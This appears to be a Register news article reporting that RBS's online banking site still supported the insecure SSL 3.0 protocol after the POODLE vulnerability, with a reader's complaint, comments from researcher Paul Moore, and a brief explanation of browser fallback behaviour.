UK banks ill-prepared for return of the rabid POODLE
Only 4,096 requests needed to uncover a 16-character cookie
Virgin laid bare
We began looking into this issue early last week, before the latest twist in the POODLE bug saga in response to a reader request. El Reg reader Richard G came to us after getting nowhere in complaining to his banks after discovering his RBS One Account (formerly the Virgin One Account) was still running SSL 3.0.
Sure enough it turned out that RBS is sticking with SSL 3.0 for its online banking website, weeks after the discovery of the POODLE vulnerability that made the already antiquated cryptographic protocol hopelessly unsafe.
Browser makers have updated their software in the aftermath of POODLE. Richard G told us that support for the out-of-date protocol was causing him all sort of problems. "My online banking no longer works with Firefox (support for SSL 3.0 dropped in FF 34)," Richard explained. "Or Chrome (dropped a while back). Or IE 11 when it is fully patched. Connections aren't allowed with Firefox or Chrome on Android either for the same reasons."
"The browsers have moved to drop SSL 3.0 and thereby cut the risk. That's very commendable. Unfortunately RBS hasn't sorted out its end," he added.
"I did contact RBS to outline the problem and ask if it was planning on moving to a protocol that wasn't actually compromised. The person I talked to didn't understand, and they suggested that it was the different browsers at fault," Richard explained.
Moore, who helped us confirm that our reader had cause for concern about the security state of RBS's website, commented: "I wonder if it is scared of dropping all those customers on really old browsers."
However, obsolete browsers are currently in minimal use so the "backward compatibility" argument justification is weak, according to Moore. "Although disabling SSL 3.0 should be mandatory, it’s clearly not a priority," Moore concluded. "We should expect and demand better of our financial institutions."
POODLE against TLS affects TLSv1, 1.1 and 1.2 and as the foundation of nearly all websites requiring in-transit encryption, so the only workable option is to patch systems. "That doesn’t negate the need to remove support for SSL 3.0, nor promote its use until a suitable patch has been applied," Moore added.
El Reg left voicemails for RBS's personal banking PR specialists last week but are yet to hear back with anything substantive.
The pre-login page here now suggests using IE. "In other words, if your browser is rejecting the site for security reasons then use one that doesn't check. Brilliant. Presumably the number of helpline calls is increasing," Richard concluded. ®
For banks that support both TLSv1 and SSL 3.0 the system should work in the following way.
- Older browsers (IE6 on XP) can connect using SSL 3.0, which is now defunct and insecure.
- Modern browsers connect over TLSv1, falling back to SSL 3.0 as/when necessary.
- Bleeding-edge browsers (FF34, Chrome v39 et al) implement a minimum fallback level (currently TLSv1). If a session tries to fallback to SSL 3.0, it will refuse the connection on the grounds that SSL 3.0 is now insecure.
Thanks to Paul Moore for this additional piece of explanation.